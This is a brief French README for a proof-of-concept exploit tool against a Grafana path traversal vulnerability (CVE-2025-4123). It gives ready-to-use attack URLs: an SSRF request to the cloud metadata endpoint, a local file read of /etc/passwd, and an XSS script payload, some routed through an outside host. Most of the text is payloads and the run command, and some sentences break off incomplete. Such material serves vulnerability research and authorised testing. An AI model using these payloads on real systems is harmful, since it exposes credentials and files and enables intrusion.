
CVE-2025-4123 - Outil Grafana
Développé par mitsec
Il s'agit d'un outil d'exploitation preuve de concept (PoC) pour CVE-2025-4123, une vulnérabilité critique de traversée de chemin dans le point de terminaison /public de Grafana. L'exploit permet de :
Instances Grafana dont le point de terminaison /public/ gère incorrectement les chemins encodés comme :
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
Sélectionnez ensuite le mode souhaité :
169.254.169.254/etc/passwd[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Ce code est fourni à des fins éducatives et de tests autorisés uniquement. Toute utilisation non autorisée contre des systèmes sans consentement est illégale.